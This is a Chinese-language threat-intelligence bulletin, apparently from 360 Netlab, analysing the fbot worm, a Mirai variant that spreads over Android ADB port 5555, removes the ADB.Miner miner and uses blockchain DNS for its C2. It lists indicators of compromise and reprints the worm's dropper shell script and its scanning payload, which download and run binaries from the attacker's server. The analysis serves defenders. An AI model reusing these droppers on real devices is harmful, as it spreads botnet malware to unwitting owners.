威胁快讯:清理adb.miner的新蠕虫fbot正在使用区块链上的DNS系统

360安全客 安全资讯 109418 4

 

ADB.Miner 已经在我们之前的多篇 文章 中提及,这是一个利用adb安卓系统调试接口传播的蠕虫,其功能单一,除了蠕虫传播模块就是挖矿。今天下午,我们注意到一个新的蠕虫正在清理 adb.miner。在完成了清理动作后,该蠕虫会等待来自C2(musl.lib,66.42.57.45:7000, Singapore/SG)的下一步指令。值得一提的是,该C2域名的解析,需要通过emercoin.com利用区块链DNS系统完成。我们将该蠕虫命名为fbot,主要是因为该蠕虫的主要执行模块使用了这个名字。 

IoC

下载服务器

188.209.52.142 Netherlands/NL    AS49349

C2服务器

musl.lib         由区块链DNS系统emercoin.com解析,当前的解析IP地址是在下面  
66.42.57.45:7000 Singapore/SG Singapore

下载URL

hxxp://188.209.52.142/c          #脚本,会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件,并做清理  
hxxp://188.209.52.142/w          #脚本,会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件,并做清理  
hxxp://188.209.52.142/fbot.aarch64     #扫描器,下同,完成自身的蠕虫传播  
hxxp://188.209.52.142/fbot.arm7  
hxxp://188.209.52.142/fbot.mips  
hxxp://188.209.52.142/fbot.mipsel  
hxxp://188.209.52.142/fbot.x86  
hxxp://188.209.52.142/fbot.x86_64

分析

恶意样本通过 adb 安卓系统调试接口投入,这与之前的 adb.miner 的投入方式一致。

投入载荷会下载执行 hxxp://188.209.52.142/c,或者是hxxp://188.209.52.142/w。这两个脚本的区别仅在下载方式是wget/curl,下文不再区分。主体功能一致,包括:

  • 尝试进一步从 188.209.52.142 下载 fbot.{arch} 恶意样本;
  • 卸载 com.ufo.miner,即ADB.Miner;
  • 完成自身清理工作。

该脚本的详细内容如下:

#!/system/bin/sh

n="arm7 mipsel mips x86 x86_64 aarch64"  
http_server="188.209.52.142"

for i in $n  
do  
    cp /system/bin/sh fbot.$i
    >fbot.$i
    curl hxxp://$http_server/fbot.$i > fbot.$i   #    wget hxxp://$http_server/fbot.$i > fbot.$i
    chmod 777 fbot.$i
    ./fbot.$i
    rm fbot.$i
done

# Cleanup
for i in $n  
do  
    rm fbot.$i
done

pm uninstall com.ufo.miner

# Suicide
rm $0

下载得到的 fbot.{arch} 是个mirai的变种,改动的部分包括:

  • C2:66.42.57.45:7000,Singapore/SG Singapore
  • 扫描:改为针对 TCP 5555 adb 端口扫描。扫描成功后,会下载hxxp://188.209.52.142/c,完成对蠕虫自身的传播。
  • 杀进程:样本中会遍历 /proc/pid/exe 目录下面的特定进程,如smi/xig/rig等。枚举得到符合条件的进程后,会杀掉该进程。

该变种保留了 mirai 僵尸网络的DDoS功能,但我们尚未检测到该C2有发出DDoS攻击指令。

扫描阶段的payload如下:

shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c

枚举进程列表

/data/local/tmp/smi
/data/local/tmp/xig
/data/local/tmp/trinity
/data/local/tmp/z
/data/local/tmp/log
/data/local/tmp/rig
/data/local/tmp/.f
/data/local/tmp/tyg

musl.lib 的域名解析

该C2域名不是一个标准的DNS域名,其顶级域 .lib 并没有在 ICANN 注册,因而也不能为通用的DNS系统解析。

该域名需要在emercoin.com上解析。当前的解析记录,见下面的连接。emercoin.com 是一个基于区块链的DNS系统。https://explorer.emercoin.com/nvs//musl.lib//25/1/1

emercoin.com 当前利用了 OpenNic 提供的公共DNS解析服务器来桥接传统DNS和区块链DNS。被感染的机器,会利用硬编码的 OpenNic 下属公共DNS解析服务器完成域名解析。这些DNS解析服务器至少包括:

163.53.248.170  
174.138.48.29  
5.132.191.104

联系我们

感兴趣的读者,可以在 twitter 或者在微信公众号 360Netlab 上联系我们。或者发送邮件给 netlab at 360 dot cn 。

(完)